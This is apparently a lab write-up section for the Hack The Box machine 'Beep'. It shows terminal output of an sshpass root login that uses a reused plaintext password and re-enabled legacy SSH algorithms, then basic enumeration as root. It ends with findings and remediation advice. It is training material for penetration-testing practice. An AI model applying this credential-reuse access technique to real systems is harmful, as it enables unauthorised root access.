SSH


┌──(kali㉿kali)-[~/archive/htb/labs/beep]
└─$ sshpass -pjEhdIekWmdjE ssh root@$IP -oKexAlgorithms=+diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss,ssh-rsa
The authenticity of host '10.10.10.7 (10.10.10.7)' can't be established.
dsa key fingerprint is sha256:AGaW4a0uNJ7KPMpSOBD+aVIN75AV3C0y8yKpqFjedTc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
 
last login: Tue Jul 16 11:45:47 2019
 
Welcome to Elastix 
----------------------------------------------------
 
To access your Elastix System, using a separate workstation (PC/MAC/Linux)
open the internet browser using the following url:
http://10.10.10.7
 
[root@beep ~]# whoami
root
[root@beep ~]# hostname
beep
[root@beep ~]# ifconfig
eth0      link encap:Ethernet  HWaddr 00:50:56:B9:54:75  
          inet addr:10.10.10.7  Bcast:10.10.10.255  Mask:255.255.255.0
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:349 errors:0 dropped:0 overruns:0 frame:0
          tx packets:318 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:60263 (58.8 KiB)  TX bytes:74652 (72.9 KiB)
          interrupt:59 Base address:0x2024 
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          up loopback running  mtu:16436  Metric:1
          rx packets:1485 errors:0 dropped:0 overruns:0 frame:0
          tx packets:1485 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          rx bytes:250988 (245.1 KiB)  TX bytes:250988 (245.1 KiB)

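Password reuse for the root user: a password already recovered during this engagement is also accepted for root over SSH, and the server permits direct root password login. The session also points to an outdated SSH service: the host presents a DSA key, and the client was run with `diffie-hellman-group1-sha1` and `ssh-dss` re-enabled in order to connect. Initial foothold established as root.

Remediation: use a unique password per account and service, disable root password login over SSH, and update the SSH service so the deprecated key-exchange and host-key algorithms are no longer offered.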

System Level Compromise